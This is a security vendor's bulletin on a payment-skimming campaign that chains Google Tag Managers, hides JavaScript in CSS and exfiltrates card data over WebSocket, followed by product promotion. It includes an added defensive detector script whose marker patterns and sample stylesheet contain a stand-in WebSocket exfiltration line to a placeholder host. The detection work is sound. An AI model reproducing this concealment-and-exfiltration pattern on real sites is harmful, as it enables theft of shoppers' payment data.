NEXT LEVEL ATTACK: SEVERAL GTMS WORKING IN SYNC, CSS AND DOM EXPLOITED

May 6, 2025

A sophisticated attack leveraging coordinated Google Tag Managers, CSS obfuscation, and DOM-based execution to deploy counterfeit payment forms and exfiltrate data via WebSocket

The Source Defense Research Intelligence team has uncovered a sophisticated cyberattack targeting e-commerce websites globally. While prior reports have noted the growing trend of nested Google Tag Managers (GTMs) injecting malicious scripts, this is the first documented case of multiple GTMs working in tandem—one dedicated to loading the payload and another executing it.

Furthermore, this attack leverages CSS to conceal the malicious script, embedding it within what appear to be legitimate styling assets—making detection particularly difficult. The script is then executed via the Document Object Model (DOM), a commonly overlooked vector for script activation. This enables attackers to present users with highly convincing counterfeit payment forms. The fake interface closely mimics legitimate ones, deceiving users into entering sensitive credentials. Once captured, the data is exfiltrated through WebSocket channels, bypassing conventional security tools that monitor standard POST requests.

The CSS payloads act as camouflage: the malicious JavaScript is embedded in stylesheet content that security tooling rarely inspects, making detection challenging. Execution is then triggered through the Document Object Model (DOM), a path that is generally unmonitored, and the result is a counterfeit payment form rendered to the user. Notably, a “double form” deception is used: a fake payment form mimicking the legitimate one is presented, tricking users into submitting sensitive information. Stolen data is then exfiltrated over WebSocket connections, bypassing traditional monitoring tools that track standard POST requests.
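The two signals described above, script text hidden in a stylesheet and a WebSocket opened to an unexpected host, can be checked from the defender's side. The following is an added example, not code from this bulletin or from the attack it describes; the marker list, the stylesheet samples, the socket targets and the allowlist are all constructed, and the scan assumes the hidden JavaScript sits as plain text inside the CSS, since the page does not document the exact hiding technique.

```javascript
// Added example (not code from the post or the attack): defender-side checks
// for the two signals the bulletin describes. Assumes the hidden JavaScript
// appears as plain text inside the stylesheet (comment or string); the
// sample stylesheet, socket targets and allowlist below are constructed.

// Tokens that have no legitimate place in a stylesheet.
const SCRIPT_MARKERS = [
  /\beval\s*\(/, /\batob\s*\(/, /new\s+Function\s*\(/,
  /new\s+WebSocket\s*\(/, /document\.createElement\s*\(/,
];

// Returns the marker patterns matched in cssText (empty array means clean).
function findScriptMarkersInCss(cssText) {
  return SCRIPT_MARKERS.filter((re) => re.test(cssText)).map((re) => re.source);
}

// True only for a ws:/wss: URL whose origin is on the allowlist; unparsable
// or relative URLs are reported as not allowed so they surface for review.
function isAllowedWebSocketTarget(url, allowedOrigins) {
  let parsed;
  try { parsed = new URL(url); } catch { return false; }
  if (parsed.protocol !== 'ws:' && parsed.protocol !== 'wss:') return false;
  return allowedOrigins.includes(parsed.origin);
}

// Combines both checks over a page's stylesheets and observed socket targets.
function assessPage(stylesheets, socketTargets, allowedOrigins) {
  const findings = [];
  for (const [asset, css] of Object.entries(stylesheets)) {
    const hits = findScriptMarkersInCss(css);
    if (hits.length > 0) findings.push({ kind: 'script-in-css', asset, hits });
  }
  for (const target of socketTargets) {
    if (!isAllowedWebSocketTarget(target, allowedOrigins)) {
      findings.push({ kind: 'unexpected-websocket', target });
    }
  }
  return findings;
}

// Constructed sample: a clean stylesheet, one carrying script text in a
// comment, and two WebSocket targets (one expected, one unknown).
const SAMPLE_STYLESHEETS = {
  'theme.css': '.checkout .btn { color: #fff; background: #0a0; }',
  'vendor.css': '.x{}/* var s=new WebSocket("wss://collector.example/r");s.send(atob("..")) */',
};
const SAMPLE_SOCKETS = ['wss://chat.shop.example/live', 'wss://collector.example/r'];
const ALLOWED_ORIGINS = ['wss://chat.shop.example'];

console.log(JSON.stringify(assessPage(SAMPLE_STYLESHEETS, SAMPLE_SOCKETS, ALLOWED_ORIGINS), null, 2));
```

In a browser the same two functions would be fed the text of each loaded stylesheet and the URLs passed to the `WebSocket` constructor; the allowlist is the set of socket origins the site is known to use.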

This multi-layered approach reflects a new level of technical finesse in client-side threats and reinforces the urgent need for proactive security solutions beyond conventional controls.

Keep in mind that protecting your checkout pages isn’t enough. This attack can be launched from seemingly innocuous pages, dynamically injecting a fully forged payment interface.

Attack details

A step-by-step description of the attack can be found in the newly posted blog: New Breed of Magecart: GTMs Working Together, JavaScript Hidden in CSS.

The image below highlights the multiple GTMs, the CSS hiding the malicious code and its execution.

How does Source Defense protect you from such attacks?

Despite the multiple methods of disguise, rest assured that even this elusive attack will be detected and blocked by Source Defense. This is made possible through our ongoing active intelligence research, which ensures that the latest malicious domains are promptly identified, blacklisted, and blocked by our system—for customers using the Protect product. In addition, our advanced technology provides rich attack details and triggers alerts, regardless of which Source Defense product is in use.

How will you be alerted?

If a malicious script attempts to load on a site protected by Source Defense, even through multiple layers of GTMs and even when executed via the DOM, you’ll receive immediate alerts:

  • New script identified – flags unknown or suspicious scripts
  • New behaviors identified:
    • Accessing PCI data
    • Accessing PII data
    • Loading script from blacklisted domain
    • Sending data to blacklisted domain

These alerts would be prominently displayed in:

  • The bell notification center 
  • The dashboard summary (marked in red)
  • The ‘Found in blacklists’ and ‘Script behaviors’ widgets with suspicious activity, both highlighted in red

It’s important to note that these flagged domains may not yet be recognized by external blacklist providers—but they are proactively identified and classified as blacklisted within our system.

PCI DSS 4.0 makes client-side security a priority.

Source Defense delivers a solution for 6.4.3 and 11.6.1 without adding a burden to your security teams.
